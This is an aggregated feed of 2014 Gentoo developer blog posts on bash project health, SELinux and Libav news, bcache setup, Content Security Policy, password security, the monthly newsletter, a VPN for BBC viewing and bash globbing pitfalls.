Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes there is a GIT "repository", but it's essentially just an import of a given release tarball, and then each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful has having a repository with the intent clearly showing, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years, not the particular vulnerability but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while, at the same time Debian did it already, and the result is that the vulnerability for them is way less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed like many other projects in the open but behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

September 24, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and even the reference platform) even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit in the first time, so I re-re-reviewed changes over and over again this time – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.

September 21, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Outreach Program for Women (September 21, 2014, 13:49 UTC)

Libav participated in the summer edition of the OPW. We had three interns Alexandra, Katerina and Nidhi.


The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start and she tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it in smaller chunks to single out false positives. The patch itself gave some spotlights to some of the most horrible code still lingering around, hopefully we’ll get to fix those part soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big projects) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and help others doing the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and make it work at least as well as the former), but both kind of tasks are fundamental to keep the project healthy!

In closing

All the projects have been a success and we are looking forward to see further contributions from our new members!

Sebastian Pipping a.k.a. sping (homepage, bugs)
Designer wanted: Western pieces for Chinese chess (September 21, 2014, 12:36 UTC)


Chinese chess is a lot easer to get into for non-Chinese people if a horse looks like / rather than 馬/傌, for the first few games. Publicly available piece set graphics seem to all have one or more of the following shortcomings:

  • Raster but vector images
  • Unclear or troublesome licensing
  • Poor aesthetics ([1], [2], [3], [4], [5], [6])
  • Lack of elephant, cannon/catapult, advisor pieces


Simplified, what I am looking for is

The resulting graphics will be published with CC0 Public Domain Dedication licensing for use to everyone. Particular use cases are use with xiangqi-setup, XBoard/WinBoard and Wikipedia.

In more detail

  • Seven pieces per party: Chariot/rook, horse, elephant, advisor, king, cannon/catapult, pawn
  • Use black “ink” only: Black pieces should be all black with parts cut out, “white”/”red” pieces  should be black outlines with body cut out (example here)
  • No two pieces should be hard to distinguish, in particular not:
    • Pawns, advisors and king
    • Elephants and horses
    • Cannons and chariots
  • Advisors should not look similar to queens in western chess
  • Flat 2D is fine. If some pieces imitate 3D, all of them should (so no flat and pseudo 3D in the same set)
  • Needs to work at small sizes. So either two sets for small and regular display or one set that works at any size.
  • Pieces should not have a circle for a background (unlike this)
  • Not too arty, not too fancy, specific rather than abstract. Clean and simple but appealing, please.
  • Chinese culture elements welcome, if you know how to use them well.

Are you interested in working on this project? Please get in touch!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
bcache (September 21, 2014, 11:59 UTC)

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformated the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformated with bcache.
In code:

wipefs /dev/md0 # remove old headers to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms

Definitely awesome!

September 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Some experience with Content Security Policy (September 19, 2014, 08:17 UTC)

XSSI recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.


If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.

September 18, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
Password security in network applications (September 18, 2014, 21:16 UTC)

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications regard the safety of password as essential and do their best to protect it.

In particular, the developer can affect the security of password
in three manners:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.

I will expand on each of them in order.

Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since it can be a valuable information, it should be especially protected so that even in case of unauthorized access to the system the attacker can not obtain it easily.

This could be achieved through use of key derivation functions, for example. In this case, a derived key is computed from user-provided password and used in the system. With a good design, the password could actually never leave client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best than an attacker could get is the derived key with no trivial way of obtaining the original secret.

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.

It is crucial that none of those primitives can be used without proving necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using authentication token that is sent to user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, omitting the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.

Best practices for user management of passwords

Server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage user to use best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, weak password should merely issue a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.

A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there should be a minimum length for a password, it should only focus on withstanding the first round of a brute force attack. Technically saying, any limitation actually reduces entropy since the attacker can safely omit short passwords. However, with the number of possibilities growing incrementally this doesn’t even matter.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case are the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply said, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

September 13, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
My first cover on a printed book (September 13, 2014, 14:03 UTC)

A few days ago I had the chance to first get my hands on a printed version of that book I designed the cover for: Einführung in die Mittelspieltaktik des Xiangqi by Rainer Schmidt. The design was done using Inkscape and xiangqi-setup. I helped out with a few things on the inside too.

A few links on the actual book:

PS: Please note the cover images are “all rights reserved”.

Gentoo Haskell Herd a.k.a. haskell (homepage, bugs)
ghc 7.8.3 and rare architectures (September 13, 2014, 09:03 UTC)

After some initially positive experience with ghc-7.8-rc1 I’ve decided to upstream most of gentoo fixes.

On rare arches ghc-7.8.3 behaves a bit bad:

  • ia64 build stopped being able to link itself after ghc-7.4 (gprel overflow)
  • on sparc, ia64 and ppc ghc was not able to create working shared libraries
  • integer-gmp library on ia64 crashed, and we had to use integer-simple

I have written a small story of those fixes here if you are curious.


To get ghc-7.8.3 working nicer for exotic arches you will need to backport at least the following patches:

Thank you!

September 08, 2014
Gentoo Monthly Newsletter: August 2014 (September 08, 2014, 21:20 UTC)

Gentoo News

Council News

Concerning the handling of bash-completion and of phase functions in eclasses in general the council decided no actions. The former should be handled by the shell-tools team, the latter needs more discussion on the mailing lists.

Then we had two hot topics. The first was the games team policy; the council clarified that the games team has in no way authority over game ebuilds maintained by other developers. In addition, the games team should elect a lead in the near future. If it doesn’t it will be considered dysfunctional.  Tim Harder (radhermit) acts as interim lead and organizes the elections.

Next, rumors about the handling of dynamic dependencies in Portage had sparked quite a stir. The council asks the Portage team basically not to remove dynamic dependency handling before they haven’t worked out and presented a good plan how Gentoo would work without them. Portage tree policies and the
handling of eclasses and virtuals in particular need to be clarified.

Finally the list of planned features for EAPI 6 was amended by two items, namely additional options for configure and a non-runtime switchable ||= () or-dependency.

Gentoo Developer Moves


Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.


  • Ian Stakenvicius (axs) joined the multilib project
  • Michał Górny (mgorny) joined the QA team
  • Kristian Fiskerstrand (k_f) joined the Security team
  • Richard Freeman (rich0) joined the systemd team
  • Pavlos Ratis (dastergon) joined the Gentoo Infrastructure team
  • Patrice Clement (monsieur) and Ian Stakenvicius (axs) joined the perl team
  • Chris Reffett (creffett) joined the Wiki team
  • Pavlos Ratis (dastergon) left the KDE project
  • Dirkjan Ochtman (djc) left the ComRel project


This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17653
Ebuilds 37397
Architecture Stable Testing Total % of Packages
alpha 3661 574 4235 23.99%
amd64 10895 6263 17158 97.20%
amd64-fbsd 0 1573 1573 8.91%
arm 2692 1755 4447 25.19%
arm64 570 32 602 3.41%
hppa 3073 496 3569 20.22%
ia64 3196 626 3822 21.65%
m68k 614 98 712 4.03%
mips 0 2410 2410 13.65%
ppc 6841 2475 9316 52.77%
ppc64 4332 971 5303 30.04%
s390 1464 349 1813 10.27%
sh 1650 427 2077 11.77%
sparc 4135 922 5057 28.65%
sparc-fbsd 0 317 317 1.80%
x86 11572 5297 16869 95.56%
x86-fbsd 0 3241 3241 18.36%



The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201408-19 app-office/openoffice-bin (and 3 more) OpenOffice, LibreOffice: Multiple vulnerabilities 283370
201408-18 net-analyzer/nrpe NRPE: Multiple Vulnerabilities 397603
201408-17 app-emulation/qemu QEMU: Multiple vulnerabilities 486352
201408-16 www-client/chromium Chromium: Multiple vulnerabilities 504328
201408-15 dev-db/postgresql-server PostgreSQL: Multiple vulnerabilities 456080
201408-14 net-misc/stunnel stunnel: Information disclosure 503506
201408-13 dev-python/jinja Jinja2: Multiple vulnerabilities 497690
201408-12 www-servers/apache Apache HTTP Server: Multiple vulnerabilities 504990
201408-11 dev-lang/php PHP: Multiple vulnerabilities 459904
201408-10 dev-libs/libgcrypt Libgcrypt: Side-channel attack 519396
201408-09 dev-libs/libtasn1 GNU Libtasn1: Multiple vulnerabilities 511536
201408-08 sys-apps/file file: Denial of Service 505534
201408-07 media-libs/libmodplug ModPlug XMMS Plugin: Multiple vulnerabilities 480388
201408-06 media-libs/libpng libpng: Multiple vulnerabilities 503014
201408-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 519790
201408-04 dev-util/catfish Catfish: Multiple Vulnerabilities 502536
201408-03 net-libs/libssh LibSSH: Information disclosure 503504
201408-02 media-libs/freetype FreeType: Arbitrary code execution 504088
201408-01 dev-php/ZendFramework Zend Framework: SQL injection 369139

Package Removals/Additions


Package Developer Date
virtual/perl-Class-ISA dilfridge 02 Aug 2014
virtual/perl-Filter dilfridge 02 Aug 2014
dev-vcs/gitosis robbat2 04 Aug 2014
dev-vcs/gitosis-gentoo robbat2 04 Aug 2014
virtual/python-argparse mgorny 11 Aug 2014
virtual/python-unittest2 mgorny 11 Aug 2014
app-emacs/sawfish ulm 19 Aug 2014
virtual/ruby-test-unit graaff 20 Aug 2014
games-action/d2x mr_bones_ 25 Aug 2014
games-arcade/koules mr_bones_ 25 Aug 2014
dev-lang/libcilkrts ottxor 26 Aug 2014


Package Developer Date
dev-python/oslotest prometheanfire 01 Aug 2014
dev-db/tokumx chainsaw 01 Aug 2014
sys-boot/gummiboot mgorny 02 Aug 2014
app-admin/supernova alunduil 03 Aug 2014
dev-db/mysql-cluster robbat2 03 Aug 2014
net-libs/txtorcon mrueg 04 Aug 2014
dev-ruby/prawn-table mrueg 06 Aug 2014
sys-apps/cv zx2c4 06 Aug 2014
media-libs/openctm amynka 07 Aug 2014
sci-libs/levmar amynka 07 Aug 2014
media-gfx/printrun amynka 07 Aug 2014
dev-python/alabaster idella4 10 Aug 2014
dev-haskell/regex-pcre slyfox 11 Aug 2014
dev-python/gcs-oauth2-boto-plugin vapier 12 Aug 2014
dev-python/astropy-helpers jlec 12 Aug 2014
dev-perl/Math-ModInt chainsaw 13 Aug 2014
dev-ruby/classifier-reborn mrueg 13 Aug 2014
media-gfx/meshlab amynka 14 Aug 2014
dev-libs/librevenge scarabeus 15 Aug 2014
www-apps/jekyll-coffeescript mrueg 15 Aug 2014
www-apps/jekyll-gist mrueg 15 Aug 2014
www-apps/jekyll-paginate mrueg 15 Aug 2014
www-apps/jekyll-watch mrueg 15 Aug 2014
sec-policy/selinux-salt swift 15 Aug 2014
www-apps/jekyll-sass-converter mrueg 15 Aug 2014
dev-ruby/rouge mrueg 15 Aug 2014
dev-ruby/ruby-beautify graaff 16 Aug 2014
sys-firmware/nvidia-firmware idl0r 17 Aug 2014
media-libs/libmpris2client ssuominen 20 Aug 2014
xfce-extra/xfdashboard ssuominen 20 Aug 2014
www-client/opera-developer jer 20 Aug 2014
dev-libs/openspecfun patrick 21 Aug 2014
dev-libs/marisa dlan 22 Aug 2014
media-sound/dcaenc beandog 22 Aug 2014
sci-mathematics/geogebra amynka 23 Aug 2014
dev-python/crumbs alunduil 25 Aug 2014
media-gfx/kxstitch kensington 26 Aug 2014
media-gfx/symboleditor kensington 26 Aug 2014
dev-perl/Sort-Key chainsaw 26 Aug 2014
dev-perl/Sort-Key-IPv4 chainsaw 26 Aug 2014
sci-visualization/yt xarthisius 26 Aug 2014
dev-ruby/globalid graaff 27 Aug 2014
dev-python/certifi idella4 27 Aug 2014
www-apps/jekyll-sitemap mrueg 27 Aug 2014
sys-apps/tuned dlan 29 Aug 2014
app-portage/g-sorcery jauhien 29 Aug 2014
app-portage/gs-elpa jauhien 29 Aug 2014
app-portage/gs-pypi jauhien 29 Aug 2014
app-admin/eselect-rust jauhien 29 Aug 2014
sys-block/raid-check chutzpah 29 Aug 2014
dev-python/python3-openid maksbotan 30 Aug 2014
dev-python/python-social-auth maksbotan 30 Aug 2014
dev-python/websocket-client alunduil 31 Aug 2014
dev-ruby/ethon graaff 31 Aug 2014


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 August 2014 and 31 August 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1575
Closed 981
Not fixed 187
Duplicates 145
Total 6023
Blocker 5
Critical 19
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 102
2 Gentoo's Team for Core System packages 39
3 Gentoo KDE team 37
4 Default Assignee for Orphaned Packages 32
5 Julian Ospald (hasufell) 26
6 Gentoo Games 25
7 Portage team 25
8 Netmon Herd 24
9 Python Gentoo Team 23
10 Others 647


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 160
2 Gentoo Security 61
3 Default Assignee for Orphaned Packages 60
4 Gentoo KDE team 45
5 Gentoo's Team for Core System packages 45
6 Gentoo Linux Gnome Desktop Team 37
7 Gentoo Games 28
8 Portage team 28
9 Python Gentoo Team 26
10 Others 1084


Heard in the community

Send us your favorite Gentoo script or tip at

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

September 07, 2014
Jeremy Olexa a.k.a. darkside (homepage, bugs)
Bypassing Geolocation … (September 07, 2014, 00:42 UTC)

By now we all know that it is pretty easy to bypass geolocation blockage with a web proxy or vpn service. After all, there is over 2 million google results on “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work then that strikes out many other ideas, I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use TOR and set the exit node to the UK. That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London and then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a feature that Linode offers, it is a user defined script ran at first boot of your host. Surprisingly, no one published one to install OpenVPN yet. So, I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a vpn automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import it into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for, I encourage you to do that same. For reference it costs a UK household, $.02 USD tax per hour for BBC. (source)

September 05, 2014

Figure 1.1: Iron Penguin

Fig. 1: Iron Penguin

Gentoo Linux is proud to announce the availability of a new LiveDVD to celebrate the continued collaboration between Gentoo users and developers, The LiveDVD features a superb list of packages, some of which are listed below.

A special thanks to the Gentoo Infrastructure Team and likewhoa. Their hard work behind the scenes provide the resources, services and technology necessary to support the Gentoo Linux project.

  • Packages included in this release: Linux Kernel 3.15.6, Xorg 1.16.0, KDE 4.13.3, Gnome 3.12.2, XFCE 4.10, Fluxbox 1.3.5, LXQT Desktop 0.7.0, i3 Desktop 2.8, Firefox 31.0, LibreOffice, Gimp 2.8.10-r1, Blender 2.71-r1, Amarok 2.8.0-r2, Chromium 37.0.2062.35 and much more ...
  • If you want to see if your package is included we have generated both the x86 package list, and amd64 package list. The FAQ is located at FAQ. DVD cases and covers for the 20140826 release are located at Artwork. Persistence mode is back in the 20140826 release!.

The LiveDVD is available in two flavors: a hybrid x86/x86_64 version, and an x86_64 multi lib version. The livedvd-x86-amd64-32ul-20140826 version will work on 32-bit x86 or 64-bit x86_64. If your CPU architecture is x86, then boot with the default gentoo kernel. If your arch is amd64, boot with the gentoo64 kernel. This means you can boot a 64-bit kernel and install a customized 64-bit user land while using the provided 32-bit user land. The livedvd-amd64-multilib-20140826 version is for x86_64 only.

If you are ready to check it out, let our bouncer direct you to the closest x86 image or amd64 image file.

If you need support or have any questions, please visit the discussion thread on our forum.

Thank you for your continued support,
Gentoo Linux Developers, the Gentoo Foundation, and the Gentoo-Ten Project.

Michał Górny a.k.a. mgorny (homepage, bugs)
Bash pitfalls: globbing everywhere! (September 05, 2014, 08:31 UTC)

Bash has many subtle pitfalls, some of them being able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers forget about to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add up to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do that as well. Secondly, by default bash (and POSIX shell) take failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

